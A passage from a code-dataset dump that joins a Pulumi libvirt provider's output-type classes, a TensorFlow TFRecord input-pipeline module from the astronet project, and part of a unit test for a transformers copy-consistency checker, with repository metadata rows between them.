hostname: Optional[str] = None,
mac: Optional[str] = None,
macvtap: Optional[str] = None,
network_id: Optional[str] = None,
network_name: Optional[str] = None,
passthrough: Optional[str] = None,
vepa: Optional[str] = None,
wait_for_lease: Optional[bool] = None):
"""
:param Sequence[str] addresses: An IP address for this domain in this network.
:param str bridge: Provides a bridge from the VM directly to the LAN. This assumes
there is a bridge device on the host which has one or more of the hosts
physical NICs enslaved. The guest VM will have an associated _tun_ device
created and enslaved to the bridge. The IP range / network configuration is
whatever is used on the LAN. This provides the guest VM full incoming &
outgoing net access just like a physical machine.
:param str hostname: A hostname that will be assigned to this domain
resource in this network.
:param str mac: The specific MAC address to use for this interface.
:param str macvtap: Packets whose destination is on the same host as where they
originate from are directly delivered to the target macvtap device. Both
origin and destination devices need to be in bridge mode for direct delivery.
If either one of them is in vepa mode, a VEPA capable bridge is required.
:param str passthrough: This feature attaches a virtual function of a SRIOV capable
NIC directly to a VM without losing the migration capability. All packets are
sent to the VF/IF of the configured network device. Depending on the
capabilities of the device additional prerequisites or limitations may apply;
for example, on Linux this requires kernel 2.6.38 or newer.
:param str vepa: All VMs' packets are sent to the external bridge. Packets whose
destination is a VM on the same host as where the packet originates from are
sent back to the host by the VEPA capable bridge (today's bridges are
typically not VEPA capable).
:param bool wait_for_lease: When creating the domain resource, wait until the
network interface gets a DHCP lease from libvirt, so that the computed IP
addresses will be available when the domain is up and the plan applied.
"""
if addresses is not None:
pulumi.set(__self__, "addresses", addresses)
if bridge is not None:
pulumi.set(__self__, "bridge", bridge)
if hostname is not None:
pulumi.set(__self__, "hostname", hostname)
if mac is not None:
pulumi.set(__self__, "mac", mac)
if macvtap is not None:
pulumi.set(__self__, "macvtap", macvtap)
if network_id is not None:
pulumi.set(__self__, "network_id", network_id)
if network_name is not None:
pulumi.set(__self__, "network_name", network_name)
if passthrough is not None:
pulumi.set(__self__, "passthrough", passthrough)
if vepa is not None:
pulumi.set(__self__, "vepa", vepa)
if wait_for_lease is not None:
pulumi.set(__self__, "wait_for_lease", wait_for_lease)
@property
@pulumi.getter
def addresses(self) -> Optional[Sequence[str]]:
"""
An IP address for this domain in this network.
"""
return pulumi.get(self, "addresses")
@property
@pulumi.getter
def bridge(self) -> Optional[str]:
"""
Provides a bridge from the VM directly to the LAN. This assumes
there is a bridge device on the host which has one or more of the hosts
physical NICs enslaved. The guest VM will have an associated _tun_ device
created and enslaved to the bridge. The IP range / network configuration is
whatever is used on the LAN. This provides the guest VM full incoming &
outgoing net access just like a physical machine.
"""
return pulumi.get(self, "bridge")
@property
@pulumi.getter
def hostname(self) -> Optional[str]:
"""
A hostname that will be assigned to this domain
resource in this network.
"""
return pulumi.get(self, "hostname")
@property
@pulumi.getter
def mac(self) -> Optional[str]:
"""
The specific MAC address to use for this interface.
"""
return pulumi.get(self, "mac")
@property
@pulumi.getter
def macvtap(self) -> Optional[str]:
"""
Packets whose destination is on the same host as where they
originate from are directly delivered to the target macvtap device. Both
origin and destination devices need to be in bridge mode for direct delivery.
If either one of them is in vepa mode, a VEPA capable bridge is required.
"""
return pulumi.get(self, "macvtap")
@property
@pulumi.getter(name="networkId")
def network_id(self) -> Optional[str]:
return pulumi.get(self, "network_id")
@property
@pulumi.getter(name="networkName")
def network_name(self) -> Optional[str]:
return pulumi.get(self, "network_name")
@property
@pulumi.getter
def passthrough(self) -> Optional[str]:
"""
This feature attaches a virtual function of a SRIOV capable
NIC directly to a VM without losing the migration capability. All packets are
sent to the VF/IF of the configured network device. Depending on the
capabilities of the device additional prerequisites or limitations may apply;
for example, on Linux this requires kernel 2.6.38 or newer.
"""
return pulumi.get(self, "passthrough")
@property
@pulumi.getter
def vepa(self) -> Optional[str]:
"""
All VMs' packets are sent to the external bridge. Packets whose
destination is a VM on the same host as where the packet originates from are
sent back to the host by the VEPA capable bridge (today's bridges are
typically not VEPA capable).
"""
return pulumi.get(self, "vepa")
@property
@pulumi.getter(name="waitForLease")
def wait_for_lease(self) -> Optional[bool]:
"""
When creating the domain resource, wait until the
network interface gets a DHCP lease from libvirt, so that the computed IP
addresses will be available when the domain is up and the plan applied.
"""
return pulumi.get(self, "wait_for_lease")
@pulumi.output_type
class DomainNvram(dict):
def __init__(__self__, *,
file: str,
template: Optional[str] = None):
"""
:param str file: The filename to use as the block device for this disk (read-only)
:param str template: path to the file used to override variables from the master NVRAM
store.
"""
pulumi.set(__self__, "file", file)
if template is not None:
pulumi.set(__self__, "template", template)
@property
@pulumi.getter
def file(self) -> str:
"""
The filename to use as the block device for this disk (read-only)
"""
return pulumi.get(self, "file")
@property
@pulumi.getter
def template(self) -> Optional[str]:
"""
path to the file used to override variables from the master NVRAM
store.
"""
return pulumi.get(self, "template")
@pulumi.output_type
class DomainTpm(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "backendDevicePath":
suggest = "backend_device_path"
elif key == "backendEncryptionSecret":
suggest = "backend_encryption_secret"
elif key == "backendPersistentState":
suggest = "backend_persistent_state"
elif key == "backendType":
suggest = "backend_type"
elif key == "backendVersion":
suggest = "backend_version"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in DomainTpm. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
DomainTpm.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
DomainTpm.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
backend_device_path: Optional[str] = None,
backend_encryption_secret: Optional[str] = None,
backend_persistent_state: Optional[bool] = None,
backend_type: Optional[str] = None,
backend_version: Optional[str] = None,
model: Optional[str] = None):
"""
:param str backend_device_path: Path to TPM device on the host, ex: `/dev/tpm0`
:param str backend_encryption_secret: [Secret object](https://libvirt.org/formatsecret.html) for encrypting the TPM state
:param bool backend_persistent_state: Keep the TPM state when a transient domain is powered off or undefined
:param str backend_type: TPM backend, either `passthrough` or `emulator` (default: `emulator`)
:param str backend_version: TPM version
:param str model: TPM model provided to the guest
"""
if backend_device_path is not None:
pulumi.set(__self__, "backend_device_path", backend_device_path)
if backend_encryption_secret is not None:
pulumi.set(__self__, "backend_encryption_secret", backend_encryption_secret)
if backend_persistent_state is not None:
pulumi.set(__self__, "backend_persistent_state", backend_persistent_state)
if backend_type is not None:
pulumi.set(__self__, "backend_type", backend_type)
if backend_version is not None:
pulumi.set(__self__, "backend_version", backend_version)
if model is not None:
pulumi.set(__self__, "model", model)
@property
@pulumi.getter(name="backendDevicePath")
def backend_device_path(self) -> Optional[str]:
"""
Path to TPM device on the host, ex: `/dev/tpm0`
"""
return pulumi.get(self, "backend_device_path")
@property
@pulumi.getter(name="backendEncryptionSecret")
def backend_encryption_secret(self) -> Optional[str]:
"""
[Secret object](https://libvirt.org/formatsecret.html) for encrypting the TPM state
"""
return pulumi.get(self, "backend_encryption_secret")
@property
@pulumi.getter(name="backendPersistentState")
def backend_persistent_state(self) -> Optional[bool]:
"""
Keep the TPM state when a transient domain is powered off or undefined
"""
return pulumi.get(self, "backend_persistent_state")
@property
@pulumi.getter(name="backendType")
def backend_type(self) -> Optional[str]:
"""
TPM backend, either `passthrough` or `emulator` (default: `emulator`)
"""
return pulumi.get(self, "backend_type")
@property
@pulumi.getter(name="backendVersion")
def backend_version(self) -> Optional[str]:
"""
TPM version
"""
return pulumi.get(self, "backend_version")
@property
@pulumi.getter
def model(self) -> Optional[str]:
"""
TPM model provided to the guest
"""
return pulumi.get(self, "model")
@pulumi.output_type
class DomainVideo(dict):
def __init__(__self__, *,
type: Optional[str] = None):
"""
:param str type: Console device type. Valid values are "pty" and "tcp".
"""
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def type(self) -> Optional[str]:
"""
Console device type. Valid values are "pty" and "tcp".
"""
return pulumi.get(self, "type")
@pulumi.output_type
class DomainXml(dict):
def __init__(__self__, *,
xslt: Optional[str] = None):
if xslt is not None:
pulumi.set(__self__, "xslt", xslt)
@property
@pulumi.getter
def xslt(self) -> Optional[str]:
return pulumi.get(self, "xslt")
@pulumi.output_type
class NetworkDhcp(dict):
def __init__(__self__, *,
enabled: Optional[bool] = None):
"""
:param bool enabled: when false, disable the DHCP server
"""
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
@property
@pulumi.getter
def enabled(self) -> Optional[bool]:
"""
when false, disable the DHCP server
"""
return pulumi.get(self, "enabled")
@pulumi.output_type
class NetworkDns(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "localOnly":
suggest = "local_only"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in NetworkDns. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
NetworkDns.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
NetworkDns.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
enabled: Optional[bool] = None,
forwarders: Optional[Sequence['outputs.NetworkDnsForwarder']] = None,
hosts: Optional[Sequence['outputs.NetworkDnsHost']] = None,
local_only: Optional[bool] = None,
srvs: Optional[Sequence['outputs.NetworkDnsSrv']] = None):
"""
:param bool enabled: when false, disable the DHCP server
:param Sequence['NetworkDnsForwarderArgs'] forwarders: Either `address`, `domain`, or both must be set
:param Sequence['NetworkDnsHostArgs'] hosts: a DNS host entry block. You can have one or more of these
blocks in your DNS definition. You must specify both `ip` and `hostname`.
:param bool local_only: true/false: true means 'do not forward unresolved requests for this domain to the part DNS server
:param Sequence['NetworkDnsSrvArgs'] srvs: a DNS SRV entry block. You can have one or more of these blocks
in your DNS definition. You must specify `service` and `protocol`.
"""
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if forwarders is not None:
pulumi.set(__self__, "forwarders", forwarders)
if hosts is not None:
pulumi.set(__self__, "hosts", hosts)
if local_only is not None:
pulumi.set(__self__, "local_only", local_only)
if srvs is not None:
pulumi.set(__self__, "srvs", srvs)
@property
@pulumi.getter
def enabled(self) -> Optional[bool]:
"""
when false, disable the DHCP server
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter
def forwarders(self) -> Optional[Sequence['outputs.NetworkDnsForwarder']]:
"""
Either `address`, `domain`, or both must be set
"""
return pulumi.get(self, "forwarders")
@property
@pulumi.getter
def hosts(self) -> Optional[Sequence['outputs.NetworkDnsHost']]:
"""
a DNS host entry block. You can have one or more of these
blocks in your DNS definition. You must specify both `ip` and `hostname`.
"""
return pulumi.get(self, "hosts")
@property
@pulumi.getter(name="localOnly")
def local_only(self) -> Optional[bool]:
"""
true/false: true means 'do not forward unresolved requests for this domain to the part DNS server
"""
return pulumi.get(self, "local_only")
@property
@pulumi.getter
def srvs(self) -> Optional[Sequence['outputs.NetworkDnsSrv']]:
"""
a DNS SRV entry block. You can have one or more of these blocks
in your DNS definition. You must specify `service` and `protocol`.
"""
return pulumi.get(self, "srvs")
@pulumi.output_type
class NetworkDnsForwarder(dict):
def __init__(__self__, *,
address: Optional[str] = None,
domain: Optional[str] = None):
"""
:param str domain: The domain used by the DNS server.
"""
if address is not None:
pulumi.set(__self__, "address", address)
if domain is not None:
pulumi.set(__self__, "domain", domain)
@property
@pulumi.getter
def address(self) -> Optional[str]:
return pulumi.get(self, "address")
@property
@pulumi.getter
def domain(self) -> Optional[str]:
"""
The domain used by the DNS server.
"""
return pulumi.get(self, "domain")
@pulumi.output_type
class NetworkDnsHost(dict):
def __init__(__self__, *,
hostname: Optional[str] = None,
ip: Optional[str] = None):
if hostname is not None:
pulumi.set(__self__, "hostname", hostname)
if ip is not None:
pulumi.set(__self__, "ip", ip)
@property
@pulumi.getter
def hostname(self) -> Optional[str]:
return pulumi.get(self, "hostname")
@property
@pulumi.getter
def ip(self) -> Optional[str]:
return pulumi.get(self, "ip")
@pulumi.output_type
class NetworkDnsSrv(dict):
def __init__(__self__, *,
domain: Optional[str] = None,
port: Optional[str] = None,
priority: Optional[str] = None,
protocol: Optional[str] = None,
service: Optional[str] = None,
target: Optional[str] = None,
weight: Optional[str] = None):
"""
:param str domain: The domain used by the DNS server.
"""
if domain is not None:
pulumi.set(__self__, "domain", domain)
if port is not None:
pulumi.set(__self__, "port", port)
if priority is not None:
pulumi.set(__self__, "priority", priority)
if protocol is not None:
pulumi.set(__self__, "protocol", protocol)
if service is not None:
pulumi.set(__self__, "service", service)
if target is not None:
pulumi.set(__self__, "target", target)
if weight is not None:
pulumi.set(__self__, "weight", weight)
@property
@pulumi.getter
def domain(self) -> Optional[str]:
"""
The domain used by the DNS server.
"""
return pulumi.get(self, "domain")
@property
@pulumi.getter
def port(self) -> Optional[str]:
return pulumi.get(self, "port")
@property
@pulumi.getter
def priority(self) -> Optional[str]:
return pulumi.get(self, "priority")
@property
@pulumi.getter
def protocol(self) -> Optional[str]:
return pulumi.get(self, "protocol")
@property
@pulumi.getter
def service(self) -> Optional[str]:
return pulumi.get(self, "service")
@property
@pulumi.getter
def target(self) -> Optional[str]:
return pulumi.get(self, "target")
@property
@pulumi.getter
def weight(self) -> Optional[str]:
return pulumi.get(self, "weight")
@pulumi.output_type
class NetworkDnsmasqOptions(dict):
def __init__(__self__, *,
options: Optional[Sequence['outputs.NetworkDnsmasqOptionsOption']] = None):
"""
:param Sequence['NetworkDnsmasqOptionsOptionArgs'] options: a Dnsmasq option entry block. You can have one or more of these
blocks in your definition. You must specify both `option_name` and `option_value`.
"""
if options is not None:
pulumi.set(__self__, "options", options)
@property
@pulumi.getter
def options(self) -> Optional[Sequence['outputs.NetworkDnsmasqOptionsOption']]:
"""
a Dnsmasq option entry block. You can have one or more of these
blocks in your definition. You must specify both `option_name` and `option_value`.
"""
return pulumi.get(self, "options")
@pulumi.output_type
class NetworkDnsmasqOptionsOption(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "optionName":
suggest = "option_name"
elif key == "optionValue":
suggest = "option_value"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in NetworkDnsmasqOptionsOption. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
NetworkDnsmasqOptionsOption.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
NetworkDnsmasqOptionsOption.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
option_name: Optional[str] = None,
option_value: Optional[str] = None):
if option_name is not None:
pulumi.set(__self__, "option_name", option_name)
if option_value is not None:
pulumi.set(__self__, "option_value", option_value)
@property
@pulumi.getter(name="optionName")
def option_name(self) -> Optional[str]:
return pulumi.get(self, "option_name")
@property
@pulumi.getter(name="optionValue")
def option_value(self) -> Optional[str]:
return pulumi.get(self, "option_value")
@pulumi.output_type
class NetworkRoute(dict):
def __init__(__self__, *,
cidr: str,
gateway: str):
pulumi.set(__self__, "cidr", cidr)
pulumi.set(__self__, "gateway", gateway)
@property
@pulumi.getter
def cidr(self) -> str:
return pulumi.get(self, "cidr")
@property
@pulumi.getter
def gateway(self) -> str:
return pulumi.get(self, "gateway")
@pulumi.output_type
class NetworkXml(dict):
def __init__(__self__, *,
xslt: Optional[str] = None):
if xslt is not None:
pulumi.set(__self__, "xslt", xslt)
@property
@pulumi.getter
def xslt(self) -> Optional[str]:
return pulumi.get(self, "xslt")
@pulumi.output_type
class PoolXml(dict):
def __init__(__self__, *,
xslt: Optional[str] = None):
if xslt is not None:
pulumi.set(__self__, "xslt", xslt)
@property
@pulumi.getter
def xslt(self) -> Optional[str]:
return pulumi.get(self, "xslt")
@pulumi.output_type
class VolumeXml(dict):
def __init__(__self__, *,
xslt: Optional[str] = None):
if xslt is not None:
pulumi.set(__self__, "xslt", xslt)
@property
@pulumi.getter
def xslt(self) -> Optional[str]:
return pulumi.get(self, "xslt")
| 34.153061
| 147
| 0.604422
|
b80c67f324021a48a1067013612fc07c23a75fa8
| 10,851
|
py
|
Python
|
research/astronet/astronet/ops/dataset_ops.py
|
kopankom/models
|
3f78f4cfd21c786c62bf321c07830071027ebb5e
|
[
"Apache-2.0"
] | 5
|
2018-04-03T15:54:54.000Z
|
2020-02-01T08:19:38.000Z
|
research/astronet/astronet/ops/dataset_ops.py
|
kopankom/models
|
3f78f4cfd21c786c62bf321c07830071027ebb5e
|
[
"Apache-2.0"
] | 1
|
2021-03-31T19:32:00.000Z
|
2021-03-31T19:32:00.000Z
|
research/astronet/astronet/ops/dataset_ops.py
|
kopankom/models
|
3f78f4cfd21c786c62bf321c07830071027ebb5e
|
[
"Apache-2.0"
] | 3
|
2018-04-27T15:37:08.000Z
|
2021-12-06T12:00:53.000Z
|
# Copyright 2018 The TensorFlow Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functions to build an input pipeline that reads from TFRecord files."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import six
import tensorflow as tf
def pad_tensor_to_batch_size(tensor, batch_size):
"""Pads a Tensor along the batch dimension to the desired batch size."""
if batch_size < 2:
raise ValueError("Cannot pad along batch dimension with batch_size < 2.")
ndims = len(tensor.shape)
if ndims < 1:
raise ValueError("Cannot pad a 0-dimensional Tensor")
num_pad_examples = batch_size - tf.shape(tensor)[0]
# paddings is a 2D Tensor with shape [ndims, 2]. Every element is zero except
# for paddings[0][1], which is the number of values to add along the 0-th
# dimension (the batch dimension) after the contents of the input tensor.
paddings = tf.sparse_to_dense(
sparse_indices=[[0, 1]],
output_shape=[ndims, 2],
sparse_values=num_pad_examples)
padded_tensor = tf.pad(tensor, paddings, name=tensor.op.name + "/pad")
# Set the new shape.
output_shape = tensor.shape.as_list()
output_shape[0] = batch_size
padded_tensor.set_shape(output_shape)
return padded_tensor
def _recursive_pad_to_batch_size(tensor_or_collection, batch_size):
"""Recursively pads to the batch size in a Tensor or collection of Tensors."""
if isinstance(tensor_or_collection, tf.Tensor):
return pad_tensor_to_batch_size(tensor_or_collection, batch_size)
if isinstance(tensor_or_collection, dict):
return {
name: _recursive_pad_to_batch_size(t, batch_size)
for name, t in tensor_or_collection.iteritems()
}
if isinstance(tensor_or_collection, collections.Iterable):
return [
_recursive_pad_to_batch_size(t, batch_size)
for t in tensor_or_collection
]
raise ValueError("Unknown input type: %s" % tensor_or_collection)
def pad_dataset_to_batch_size(dataset, batch_size):
"""Pads Tensors in a dataset along the batch dimension to batch_size.
The output contains a 'weights' Tensor, which is a 0/1 indicator of padded
elements. If a 'weights' Tensor already exists in the input dataset, then that
Tensor is padded with zeros. If a 'weights' Tensor does not already exist,
then the input dataset is assumed to have a 'labels' Tensor which is used to
construct the weights.
Args:
dataset: A tf.data.Dataset.
batch_size: Integer batch size.
Returns:
A tf.data.Dataset.
"""
def map_fn(tensors):
"""Pads Tensors along the batch dimension to the desired batch size."""
if not isinstance(tensors, dict):
raise ValueError(
"pad_dataset_to_batch_size requires a dictionary of named Tensors.")
outputs = _recursive_pad_to_batch_size(tensors, batch_size)
if "weights" not in outputs:
weights = tf.ones_like(tensors["labels"], dtype=tf.float32)
outputs["weights"] = pad_tensor_to_batch_size(weights, batch_size)
return outputs
return dataset.map(map_fn)
def _recursive_set_batch_size(tensor_or_collection, batch_size):
"""Recursively sets the batch size in a Tensor or collection of Tensors."""
if isinstance(tensor_or_collection, tf.Tensor):
t = tensor_or_collection
shape = t.shape.as_list()
shape[0] = batch_size
t.set_shape(t.shape.merge_with(shape))
elif isinstance(tensor_or_collection, dict):
for t in six.itervalues(tensor_or_collection):
_recursive_set_batch_size(t, batch_size)
elif isinstance(tensor_or_collection, collections.Iterable):
for t in tensor_or_collection:
_recursive_set_batch_size(t, batch_size)
else:
raise ValueError("Unknown input type: %s" % tensor_or_collection)
return tensor_or_collection
def set_batch_size(dataset, batch_size):
"""Sets the batch dimension in all Tensors to batch_size."""
return dataset.map(lambda t: _recursive_set_batch_size(t, batch_size))
def build_dataset(file_pattern,
input_config,
batch_size,
include_labels=True,
reverse_time_series_prob=0,
shuffle_filenames=False,
shuffle_values_buffer=0,
repeat=1,
use_tpu=False):
"""Builds an input pipeline that reads a dataset from sharded TFRecord files.
Args:
file_pattern: File pattern matching input TFRecord files, e.g.
"/tmp/train-?????-of-00100". May also be a comma-separated list of file
patterns.
input_config: ConfigDict containing feature and label specifications.
batch_size: The number of examples per batch.
include_labels: Whether to read labels from the input files.
reverse_time_series_prob: If > 0, the time series features will be randomly
reversed with this probability. Within a given example, either all time
series features will be reversed, or none will be reversed.
shuffle_filenames: Whether to shuffle the order of TFRecord files between
epochs.
shuffle_values_buffer: If > 0, shuffle examples using a buffer of this size.
repeat: The number of times to repeat the dataset. If None or -1 the dataset
will repeat indefinitely.
use_tpu: Whether to build the dataset for TPU.
Raises:
ValueError: If an input file pattern does not match any files, or if the
label IDs in input_config.label_map are not contiguous integers starting
at 0.
Returns:
A tf.data.Dataset object.
"""
file_patterns = file_pattern.split(",")
filenames = []
for p in file_patterns:
matches = tf.gfile.Glob(p)
if not matches:
raise ValueError("Found no input files matching %s" % p)
filenames.extend(matches)
tf.logging.info("Building input pipeline from %d files matching patterns: %s",
len(filenames), file_patterns)
if include_labels:
# Ensure that the label ids are contiguous integers starting at 0.
label_ids = set(input_config.label_map.values())
if label_ids != set(range(len(label_ids))):
raise ValueError(
"Label IDs must be contiguous integers starting at 0. Got: %s" %
label_ids)
# Create a HashTable mapping label strings to integer ids.
table_initializer = tf.contrib.lookup.KeyValueTensorInitializer(
keys=input_config.label_map.keys(),
values=input_config.label_map.values(),
key_dtype=tf.string,
value_dtype=tf.int32)
label_to_id = tf.contrib.lookup.HashTable(
table_initializer, default_value=-1)
def _example_parser(serialized_example):
"""Parses a single tf.Example into image and label tensors."""
# Set specifications for parsing the features.
data_fields = {
feature_name: tf.FixedLenFeature([feature.length], tf.float32)
for feature_name, feature in input_config.features.iteritems()
}
if include_labels:
data_fields[input_config.label_feature] = tf.FixedLenFeature([],
tf.string)
# Parse the features.
parsed_features = tf.parse_single_example(
serialized_example, features=data_fields)
if reverse_time_series_prob > 0:
# Randomly reverse time series features with probability
# reverse_time_series_prob.
should_reverse = tf.less(
tf.random_uniform([], 0, 1),
reverse_time_series_prob,
name="should_reverse")
# Reorganize outputs.
output = {}
for feature_name, value in parsed_features.iteritems():
if include_labels and feature_name == input_config.label_feature:
label_id = label_to_id.lookup(value)
# Ensure that the label_id is nonnegative to verify a successful hash
# map lookup.
assert_known_label = tf.Assert(
tf.greater_equal(label_id, tf.to_int32(0)),
["Unknown label string:", value])
with tf.control_dependencies([assert_known_label]):
label_id = tf.identity(label_id)
# We use the plural name "labels" in the output due to batching.
output["labels"] = label_id
elif input_config.features[feature_name].is_time_series:
# Possibly reverse.
if reverse_time_series_prob > 0:
# pylint:disable=cell-var-from-loop
value = tf.cond(should_reverse, lambda: tf.reverse(value, axis=[0]),
lambda: tf.identity(value))
# pylint:enable=cell-var-from-loop
if "time_series_features" not in output:
output["time_series_features"] = {}
output["time_series_features"][feature_name] = value
else:
if "aux_features" not in output:
output["aux_features"] = {}
output["aux_features"][feature_name] = value
return output
# Create a string dataset of filenames, and possibly shuffle.
filename_dataset = tf.data.Dataset.from_tensor_slices(filenames)
if len(filenames) > 1 and shuffle_filenames:
filename_dataset = filename_dataset.shuffle(len(filenames))
# Read serialized Example protos.
dataset = filename_dataset.flat_map(tf.data.TFRecordDataset)
# Possibly shuffle. Note that we shuffle before repeat(), so we only shuffle
# elements among each "epoch" of data, and not across epochs of data.
if shuffle_values_buffer > 0:
dataset = dataset.shuffle(shuffle_values_buffer)
# Repeat.
if repeat != 1:
dataset = dataset.repeat(repeat)
# Map the parser over the dataset.
dataset = dataset.map(_example_parser, num_parallel_calls=4)
# Batch results by up to batch_size.
dataset = dataset.batch(batch_size)
if repeat == -1 or repeat is None:
# The dataset repeats infinitely before batching, so each batch has the
# maximum number of elements.
dataset = set_batch_size(dataset, batch_size)
elif use_tpu:
# TPU requires all dimensions to be fixed. Since the dataset does not repeat
# infinitely before batching, the final batch may have fewer than batch_size
# elements. Therefore we pad to ensure that the final batch has batch_size
# elements.
dataset = pad_dataset_to_batch_size(dataset, batch_size)
# Prefetch a few batches.
dataset = dataset.prefetch(max(1, int(256 / batch_size)))
return dataset
| 37.808362
| 80
| 0.70611
|
5789496a8ac6fb61595bc6316ec1ded1d17e600e
| 9,020
|
py
|
Python
|
tests/test_utils_check_copies.py
|
uunal/adapter-transformers
|
73a95a75f803e8fd243fc3d55ff3a9d557891377
|
[
"Apache-2.0"
] | 723
|
2020-07-16T13:02:25.000Z
|
2022-03-31T21:03:55.000Z
|
tests/test_utils_check_copies.py
|
uunal/adapter-transformers
|
73a95a75f803e8fd243fc3d55ff3a9d557891377
|
[
"Apache-2.0"
] | 170
|
2020-07-16T14:39:11.000Z
|
2022-03-31T13:02:11.000Z
|
tests/test_utils_check_copies.py
|
uunal/adapter-transformers
|
73a95a75f803e8fd243fc3d55ff3a9d557891377
|
[
"Apache-2.0"
] | 131
|
2020-07-16T14:38:16.000Z
|
2022-03-29T19:43:18.000Z
|
# Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import re
import shutil
import sys
import tempfile
import unittest
import black
git_repo_path = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
sys.path.append(os.path.join(git_repo_path, "utils"))
import check_copies # noqa: E402
# This is the reference code that will be used in the tests.
# If BertLMPredictionHead is changed in modeling_bert.py, this code needs to be manually updated.
REFERENCE_CODE = """ def __init__(self, config):
super().__init__()
self.transform = BertPredictionHeadTransform(config)
# The output weights are the same as the input embeddings, but there is
# an output-only bias for each token.
self.decoder = nn.Linear(config.hidden_size, config.vocab_size, bias=False)
self.bias = nn.Parameter(torch.zeros(config.vocab_size))
# Need a link between the two variables so that the bias is correctly resized with `resize_token_embeddings`
self.decoder.bias = self.bias
def forward(self, hidden_states, inv_lang_adapter=None):
hidden_states = self.transform(hidden_states)
if inv_lang_adapter:
hidden_states = inv_lang_adapter(hidden_states, rev=True)
hidden_states = self.decoder(hidden_states)
return hidden_states
"""
class CopyCheckTester(unittest.TestCase):
def setUp(self):
self.transformer_dir = tempfile.mkdtemp()
os.makedirs(os.path.join(self.transformer_dir, "models/bert/"))
check_copies.TRANSFORMER_PATH = self.transformer_dir
shutil.copy(
os.path.join(git_repo_path, "src/transformers/models/bert/modeling_bert.py"),
os.path.join(self.transformer_dir, "models/bert/modeling_bert.py"),
)
def tearDown(self):
check_copies.TRANSFORMER_PATH = "src/transformers"
shutil.rmtree(self.transformer_dir)
def check_copy_consistency(self, comment, class_name, class_code, overwrite_result=None):
code = comment + f"\nclass {class_name}(nn.Module):\n" + class_code
if overwrite_result is not None:
expected = comment + f"\nclass {class_name}(nn.Module):\n" + overwrite_result
code = black.format_str(code, mode=black.FileMode([black.TargetVersion.PY35], line_length=119))
fname = os.path.join(self.transformer_dir, "new_code.py")
with open(fname, "w", newline="\n") as f:
f.write(code)
if overwrite_result is None:
self.assertTrue(len(check_copies.is_copy_consistent(fname)) == 0)
else:
check_copies.is_copy_consistent(f.name, overwrite=True)
with open(fname, "r") as f:
self.assertTrue(f.read(), expected)
def test_find_code_in_transformers(self):
code = check_copies.find_code_in_transformers("models.bert.modeling_bert.BertLMPredictionHead")
self.assertEqual(code, REFERENCE_CODE)
def test_is_copy_consistent(self):
# Base copy consistency
self.check_copy_consistency(
"# Copied from transformers.models.bert.modeling_bert.BertLMPredictionHead",
"BertLMPredictionHead",
REFERENCE_CODE + "\n",
)
# With no empty line at the end
self.check_copy_consistency(
"# Copied from transformers.models.bert.modeling_bert.BertLMPredictionHead",
"BertLMPredictionHead",
REFERENCE_CODE,
)
# Copy consistency with rename
self.check_copy_consistency(
"# Copied from transformers.models.bert.modeling_bert.BertLMPredictionHead with Bert->TestModel",
"TestModelLMPredictionHead",
re.sub("Bert", "TestModel", REFERENCE_CODE),
)
# Copy consistency with a really long name
long_class_name = "TestModelWithAReallyLongNameBecauseSomePeopleLikeThatForSomeReason"
self.check_copy_consistency(
f"# Copied from transformers.models.bert.modeling_bert.BertLMPredictionHead with Bert->{long_class_name}",
f"{long_class_name}LMPredictionHead",
re.sub("Bert", long_class_name, REFERENCE_CODE),
)
# Copy consistency with overwrite
self.check_copy_consistency(
"# Copied from transformers.models.bert.modeling_bert.BertLMPredictionHead with Bert->TestModel",
"TestModelLMPredictionHead",
REFERENCE_CODE,
overwrite_result=re.sub("Bert", "TestModel", REFERENCE_CODE),
)
def test_convert_to_localized_md(self):
localized_readme = check_copies.LOCALIZED_READMES["README_zh-hans.md"]
